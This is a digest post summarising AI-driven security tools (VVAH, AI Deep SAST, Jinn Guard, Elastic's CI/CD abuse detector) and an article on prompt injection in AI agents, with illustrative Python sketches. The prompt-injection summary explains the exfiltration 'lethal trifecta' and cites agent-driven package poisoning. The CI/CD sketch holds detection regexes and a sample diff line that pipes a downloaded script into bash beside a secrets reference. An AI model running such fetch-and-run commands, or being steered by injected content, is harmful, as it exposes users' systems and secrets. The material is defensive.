Posts

Visa Vulnerability Agentic Harness (VVAH) - Agentic SAST Pipeline

Visa Vulnerability Agentic Harness (VVAH) is an open-source tool from Visa that uses frontier AI models for autonomous vulnerability discovery in code. Built on lessons from Anthropic's Project Glasswing, it employs a three-phase, nine-stage pipeline that combines threat modeling, multi-agent deterministic voting to reduce false positives, and structured triage to shorten the path from discovery to fix. The tool supports multiple AI backends (Anthropic Claude, OpenAI), and each pipeline stage is configurable through reusable "skills". It outputs findings as both Markdown reports and SARIF. Findings are AI-generated and require human review; the tool's stated aim is to improve the Mean Time to Adapt (MTTA) for security fixes. The project is not accepting external contributions and is intended only for authorized use on code you own or have permission to test. https://github.com/visa/visa-vulnerability-agentic-harness
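
The summary does not say how VVAH's voting works internally, so the following is only a generic sketch of the idea: several agents review the same code independently, and a finding survives only if enough of them report it. The function name `vote_on_findings`, the `(file, line, CWE)` finding tuple, and the `min_votes` threshold are all assumptions made for illustration, not part of the tool.

```python
from collections import Counter

def vote_on_findings(agent_reports, min_votes):
    """Keep findings reported by at least `min_votes` independent agents.

    Hypothetical helper: each report is a collection of hashable findings.
    """
    counts = Counter()
    for report in agent_reports:
        # Deduplicate within one report so each agent votes once per finding.
        counts.update(set(report))
    # Sorting makes the result independent of the order agents reported in.
    return sorted(f for f, n in counts.items() if n >= min_votes)

# Three hypothetical agent runs over the same repository.
reports = [
    {("app/db.py", 42, "CWE-89"), ("app/views.py", 10, "CWE-79")},
    {("app/db.py", 42, "CWE-89")},
    {("app/db.py", 42, "CWE-89"), ("app/auth.py", 7, "CWE-798")},
]
confirmed = vote_on_findings(reports, min_votes=2)
```

With a threshold of two votes, only the finding all three runs agree on is kept; the two single-agent findings are dropped as likely false positives. A real pipeline would also need to decide when two differently worded findings count as the same one.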

AI Deep SAST - LLM-powered deep static analysis for CI/CD

AI Deep SAST is an open-source tool from Cisco that combines traditional static analysis (Semgrep) with LLM-based vulnerability detection for CI/CD pipelines. It offers two scan modes: **fast scan** (Semgrep + local Foundation-Sec-8B model, ~5 min) and **deep scan** (tree-sitter indexing + frontier LLMs like GPT-4o or Claude, ~30 min–14 hr). Features include OWASP Top 10 mapping, CWE mapping, CVSS scoring, attack vectors, remediation code, and defence-in-depth recommendations. The tool uses smart LLM skipping for deterministic rules, severity-based filtering, and multiple report formats (Markdown, JSON, JUnit XML). It includes custom secret detection for config files, supports 15 programming languages via tree-sitter, and provides a Jenkins CI/CD pipeline with quality gates. The local fast scan keeps code on-premises (no external API calls), while deep scan sends redacted code to configured LLM providers. Optimised for Apple Silicon with Metal GPU acceleration, it requires ~16 GB RAM a...
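
How the tool implements severity filtering and LLM skipping is not described here. As a rough sketch under assumptions: findings below a severity threshold are dropped, findings from rules treated as deterministic go straight to the report, and only the remainder is queued for LLM review. The names `plan_review`, `SEVERITY_ORDER`, and the finding fields are hypothetical.

```python
# Hypothetical severity ranking; the tool's real levels may differ.
SEVERITY_ORDER = {"low": 0, "medium": 1, "high": 2, "critical": 3}

def plan_review(findings, min_severity="medium", deterministic_rules=frozenset()):
    """Split findings into (report_directly, needs_llm_review)."""
    threshold = SEVERITY_ORDER[min_severity]
    report_directly, needs_llm = [], []
    for finding in findings:
        if SEVERITY_ORDER[finding["severity"]] < threshold:
            continue  # severity-based filtering: drop low-priority noise
        if finding["rule"] in deterministic_rules:
            report_directly.append(finding)  # skip the LLM call entirely
        else:
            needs_llm.append(finding)
    return report_directly, needs_llm

findings = [
    {"rule": "hardcoded-secret", "severity": "high"},
    {"rule": "possible-sqli", "severity": "high"},
    {"rule": "debug-log", "severity": "low"},
]
direct, queued = plan_review(findings, deterministic_rules={"hardcoded-secret"})
```

The point of the split is cost: an exact pattern match gains little from a second opinion, so LLM time is spent only on findings that need judgment.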

Jinn Guard — Enterprise Semantic Firewall

Jinn Guard is an **asynchronous, kernel-aware semantic firewall** that enforces mathematical safety constraints on autonomous AI agents before any tool executes. It intercepts agent intents and validates them through a **Z3 SMT solver pipeline**, checking state transitions and risk ceilings against formalized compliance models. Built for AlphaOS, it operates over UNIX domain sockets and integrates **eBPF kernel telemetry** for zero-trust isolation and anti-replay protection. Key features include HMAC-SHA256 authentication, SO_PEERCRED process identity, per-agent intent allowlists, sequence quotas, replay attack protection, behavioral drift detection, and a hash-chained audit log. Performance benchmarks show ~6,500 decisions/second with median latency of 257 µs. The system blocks 12 attack types (replay, signature forgery, injection, etc.) with zero fail-open. It includes a Python SDK, systemd service, and installer. The repository is a **validated research prototype** (not enterprise-G...
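
Three of the listed features (HMAC-SHA256 authentication, replay protection, and a hash-chained audit log) can be illustrated with the standard library alone. This is a minimal sketch of those general techniques, not Jinn Guard's code or SDK: the `Gate` class, the `sign` helper, the message layout, and the demo key are all assumptions, and the Z3, eBPF, and socket layers are left out.

```python
import hashlib
import hmac
import json

SECRET = b"demo-shared-key"  # hypothetical key, for illustration only

def sign(agent_id, seq, intent, key=SECRET):
    """HMAC-SHA256 tag over (agent, sequence number, intent)."""
    msg = json.dumps([agent_id, seq, intent]).encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()

class Gate:
    def __init__(self, key=SECRET):
        self.key = key
        self.last_seq = {}    # agent_id -> highest sequence number accepted
        self.log = []         # list of (record_json, chained_digest)
        self.head = "0" * 64  # genesis value for the hash chain

    def _append(self, record):
        body = json.dumps(record, sort_keys=True)
        # Each digest covers the previous digest, so edits break the chain.
        self.head = hashlib.sha256((self.head + body).encode()).hexdigest()
        self.log.append((body, self.head))

    def check(self, agent_id, seq, intent, tag):
        expected = sign(agent_id, seq, intent, self.key)
        if not hmac.compare_digest(expected, tag):
            verdict = "deny:bad-signature"
        elif seq <= self.last_seq.get(agent_id, -1):
            verdict = "deny:replay"  # sequence number already used
        else:
            self.last_seq[agent_id] = seq
            verdict = "allow"
        self._append({"agent": agent_id, "seq": seq,
                      "intent": intent, "verdict": verdict})
        return verdict

def verify_chain(log):
    """Recompute the chain and confirm every stored digest matches."""
    head = "0" * 64
    for body, digest in log:
        head = hashlib.sha256((head + body).encode()).hexdigest()
        if head != digest:
            return False
    return True

gate = Gate()
tag = sign("agent-1", 1, "read_file")
first = gate.check("agent-1", 1, "read_file", tag)   # fresh, valid request
second = gate.check("agent-1", 1, "read_file", tag)  # same message replayed
```

Every decision, including denials, is appended to the log, which is the fail-closed habit the summary describes: a request that cannot be verified is rejected and recorded rather than passed through.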

AI Agent Security Hits Its Reckoning: Prompt Injection May Be a Permanent Flaw, Not a Patchable Bug

This article argues that prompt injection in LLM-based agents is a **structural, unpatchable flaw** rather than a temporary bug. Citing OWASP’s June 2026 State of Agentic AI Security report, it explains that language models cannot distinguish trusted commands from untrusted data because all inputs are processed as a single token stream—no architectural privilege boundary exists. The piece highlights real incidents: an autonomous bot (“hackerbot-claw”) poisoning PyPI with backdoored LiteLLM (47,000 downloads) and CVEs like CVE-2026-2256 (MS-Agent RCE), CVE-2026-22708 (Cursor), and malicious MCP servers. It introduces **Simon Willison’s “lethal trifecta”** (private data access + untrusted content exposure + external communication) as the condition enabling data exfiltration, and **Meta’s “Agents Rule of Two”** (an unsupervised agent may hold at most two of three). Defenses are containment-based (least privilege, human-in-the-loop, strict scoping), not cures. Regulatory pressure (DORA, NI...
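
The Rule of Two as summarized above reduces to a small set check. The sketch below assumes capability labels of my own choosing (`private_data`, `untrusted_content`, `external_comms`) and a hypothetical `violates_rule_of_two` helper; it illustrates the rule and is not code from Meta or from the article.

```python
# The three properties of the "lethal trifecta" (labels are illustrative).
TRIFECTA = frozenset({"private_data", "untrusted_content", "external_comms"})

def violates_rule_of_two(capabilities, supervised=False):
    """True if an unsupervised agent holds all three trifecta properties."""
    held = TRIFECTA & set(capabilities)
    return not supervised and len(held) == 3

email_agent = {"private_data", "untrusted_content", "external_comms"}
summarizer = {"untrusted_content", "external_comms"}

risky = violates_rule_of_two(email_agent)
safe = violates_rule_of_two(summarizer)
```

A check like this does not stop prompt injection. It only flags agent configurations in which a successful injection could both reach private data and send it out, which is the containment framing the article argues for.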

elastic/cicd-abuse-detector: CI/CD Abuse Detection

This GitHub repository hosts a **prototype CI/CD abuse detector** from Elastic Security Labs. It provides drop-in CI templates that use an LLM (Claude) to detect suspicious changes to pipelines, workflows, and automation configurations – specifically targeting attacks where stolen credentials are used to modify workflows and harvest CI secrets. The detector works by filtering changed CI/CD files, generating per-file diffs, enriching them with regex-based prescreen labels, having an LLM analyze the diff for credential-harvesting threats, then alerting (Slack, issues, Elasticsearch) and optionally failing the PR based on severity thresholds. It includes reference templates for GitHub Actions, GitLab CI, and Azure DevOps. The repository is **not an officially supported Elastic product** – users are expected to fork and customize the templates, prompts, and schemas for their own environment. Documentation covers architecture, threat model, setup per platform, alerting, and testing.  ht...
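
The first stages of that flow (filter changed CI/CD files, then attach regex-based prescreen labels to each diff) might look roughly like the sketch below. The path patterns, label names, and regular expressions are assumptions for illustration and are not taken from the repository; the LLM analysis and alerting steps are omitted.

```python
import fnmatch
import re

# Hypothetical path patterns for pipeline definitions.
CI_PATTERNS = [
    ".github/workflows/*.yml",
    ".github/workflows/*.yaml",
    ".gitlab-ci.yml",
    "azure-pipelines.yml",
]

# Hypothetical prescreen labels and the patterns that trigger them.
PRESCREEN = {
    "secret-reference": re.compile(r"\$\{\{\s*secrets\.", re.IGNORECASE),
    "pipe-to-shell": re.compile(r"curl[^\n|]*\|\s*(ba)?sh"),
    "encoded-payload": re.compile(r"base64\s+(-d|--decode)"),
}

def is_ci_file(path):
    """True if the changed path looks like a CI/CD definition."""
    return any(fnmatch.fnmatchcase(path, pattern) for pattern in CI_PATTERNS)

def prescreen(diff_text):
    """Return sorted labels whose pattern matches any added line of the diff."""
    added = [
        line[1:] for line in diff_text.splitlines()
        if line.startswith("+") and not line.startswith("+++")
    ]
    return sorted(
        label for label, rx in PRESCREEN.items()
        if any(rx.search(line) for line in added)
    )

changed = [".github/workflows/release.yml", "src/main.py", ".gitlab-ci.yml"]
ci_files = [path for path in changed if is_ci_file(path)]

diff = (
    "--- a/.github/workflows/release.yml\n"
    "+++ b/.github/workflows/release.yml\n"
    "-      run: make test\n"
    "+      run: curl https://example.invalid/x.sh | bash\n"
    "+      env:\n"
    "+        TOKEN: ${{ secrets.DEPLOY_TOKEN }}\n"
)
labels = prescreen(diff)
```

Cheap labels like these are hints rather than verdicts. In the flow described above they enrich the diff before the LLM sees it, so the model's attention is drawn to the lines most likely to matter.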

Policy as Code: From Documents to Machine Intelligence

This blog post argues that traditional static policy documents cannot keep pace with modern multi-cloud, ephemeral, and continuous deployment environments. It presents **Policy as Code (PaC)** as a discipline that transforms policies into machine-readable, version-controlled, continuously enforced and auditable rules. PaC operates across three areas: modernizing policies, embedding validation into development/operations, and enabling continuous assurance. Key enablers include **OSCAL** (for machine-readable control definitions, profiles, and system plans) and **Open Policy Agent (OPA)** (for enforcement using Rego rules). The Compliance-to-Policy (C2P) bridge helps convert existing OSCAL artifacts into enforcement formats. A worked example (MFA for privileged accounts) traces a control from OSCAL catalog through OPA enforcement to evidence generation. The post concludes that **agentic AI** can accelerate PaC adoption by automating policy translation, rule testing, and remediation triag...
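
To make the MFA example concrete, here is the shape of such a rule and its evidence record. In OPA the rule would be written in Rego; the Python below only mirrors the logic, and the account fields, the control identifier `example-mfa-privileged`, and the function names are hypothetical rather than taken from the post or from any OSCAL catalog.

```python
def mfa_violations(accounts):
    """Return IDs of privileged accounts that do not have MFA enabled."""
    return [
        account["id"] for account in accounts
        if account.get("privileged") and not account.get("mfa_enabled")
    ]

def build_evidence(control_id, accounts):
    """Summarize one evaluation as a machine-readable evidence record."""
    violations = mfa_violations(accounts)
    return {
        "control": control_id,
        "checked": len(accounts),
        "violations": violations,
        "compliant": not violations,
    }

accounts = [
    {"id": "alice", "privileged": True, "mfa_enabled": True},
    {"id": "bob", "privileged": True, "mfa_enabled": False},
    {"id": "carol", "privileged": False, "mfa_enabled": False},
]
record = build_evidence("example-mfa-privileged", accounts)
```

The evidence record is what separates this from a written policy: each evaluation leaves a structured result that can be versioned, aggregated, and handed to an auditor.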

Infosys completes CMMI AI maturity pilot assessment

Infosys has completed the CMMI AI Maturity pilot assessment, becoming one of the first organizations globally to do so. Conducted by the CMMI Institute with support from KPMG, the assessment evaluated how large enterprises govern and apply AI across business and engineering environments. The pilot focused on AI-augmented software development, maintenance, testing, and support, assessing productivity, quality, governance, and responsible AI practices. Infosys contributed real-world insights from its large-scale delivery operations (including Infosys Topaz tools) to help refine the framework for enterprise use. The model addresses alignment with business outcomes, consistency, risk management, and accountability in AI-driven decisions. Executives described the milestone as helping to define responsible, enterprise-grade AI adoption at scale. https://securitybrief.co.nz/story/infosys-completes-cmmi-ai-maturity-pilot-assessment